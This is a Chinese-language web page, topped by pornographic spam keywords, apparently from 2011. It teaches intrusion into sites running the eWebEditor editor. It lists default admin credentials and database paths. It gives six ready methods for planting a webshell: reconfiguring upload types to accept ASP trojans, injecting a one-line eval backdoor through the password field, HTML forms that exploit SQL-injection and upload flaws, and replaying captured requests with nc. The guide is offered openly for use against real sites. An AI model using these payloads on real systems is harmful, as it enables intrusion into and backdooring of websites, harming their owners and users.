欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

腳本入侵 入侵ewebeditor編輯器一些技巧

  發(fā)布時(shí)間:2011-04-24 15:39:30   作者:佚名   我要評(píng)論
腳本入侵 入侵ewebeditor編輯器一些技巧,使用ewebeditor的朋友可以參考下。
eWebEditor編輯器
建議最好檢測下admin_style.asp文件是否可以直接訪問 直接到樣式管理
默認(rèn)后臺(tái)地址:/ewebeditor/admin_login.asp
使用默認(rèn)密碼:admin/admin 或 admin/admin888
不行就默認(rèn)數(shù)據(jù)庫路徑 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一種方法
登陸后臺(tái)點(diǎn)擊“樣式管理”-選擇新增樣式
只寫這幾樣 大家照做就行了
樣式名稱:chouxiaozi 隨便寫
路徑模式:選擇絕對(duì)路徑
圖片類型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
這樣我們可以上各種格式的木馬 我們只要把木馬改成添加的這些格式就可以了
上傳路徑:寫上這個(gè)admin/ 或?qū)? 免的別人把UploadFile/目錄刪了 我們找不到馬
內(nèi)容路徑:空 記得
圖片限制:寫上1000 免的上不了我們的asp木馬
然后我們就可以提交了
就可以看到樣式增加成功!
然后我們按-返回樣式管理 找到剛才添加的樣式名稱 然后按工具欄 在按新增工具欄
然后按-按鈕設(shè)置 在可選按鈕 選擇插入圖片然后按》 -然后保存設(shè)置
在返回樣式管理-找到剛才添加的樣式名稱-按預(yù)覽-這里回看到一個(gè)正方形的東西 我們點(diǎn)擊
然后上傳我們的剛才添加的格式的木馬

拿webshell方法第二種方法
登陸后臺(tái),點(diǎn)擊修改密碼---新密碼設(shè)置為 1":eval request("choxiaozi")’
設(shè)置成功后,訪問asp/config.asp文件即可,一句話木馬被寫入到這個(gè)文件里面了.
然后用一句話客戶端連接
拿webshell方法第三種方法
ewebeditor不登陸也獲得webshell 這就不多說了 大家去百度搜索 ewebeditor不登陸也獲得webshell
下載教程看

拿webshell方法第四種方法
利用ewebeditor asp版 2.1.6 上傳漏洞利用程序
首先先看eWebEditor/upload.asp 上傳地址存在不
存在的話就把下面的代碼保存為
H1>ewebeditor asp版 2.1.6 上傳漏洞利用程序----</H1><br><br>
<form action="這里寫上傳地址?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
改上傳地址保存為chouxiaozi.HTM文件,打開可以直接上傳CER文件,測試成功.上傳后地址看源文件
就可以看到我們上傳的路徑和地址
拿webshell方法第五種方法
ewebeditor 雞肋的上傳漏洞
首先先看下ewebeditor/asp/upload.asp 上傳地址存在不
存在就
把下面的代碼
<form action="這里寫上傳地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存為chouxiaozi.html
打開可以直接上傳gif文件,測試成功.上傳后地址看源文件
就可以看到我們上傳的路徑和地址
拿webshell方法第六種方法
利用eWebEditor/upload.asp
抓包和nc上傳
抓包c(diǎn)ookies 參數(shù) 和文件的數(shù)據(jù) 然后保存成文本 比如chouxiaozi.txt
然后用編譯C32asm 或等等編譯工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
不懂抓包和nc上傳 百度搜索相關(guān)教程
回頭說下有時(shí)候進(jìn)了個(gè)網(wǎng)站后臺(tái)-看到了eWebEditor編輯器 但是找不到eWebEditor目錄地址
我們來點(diǎn)鼠標(biāo)右鍵-查看源代碼,找到仔細(xì)找eWebEditor的路徑。

相關(guān)文章

最新評(píng)論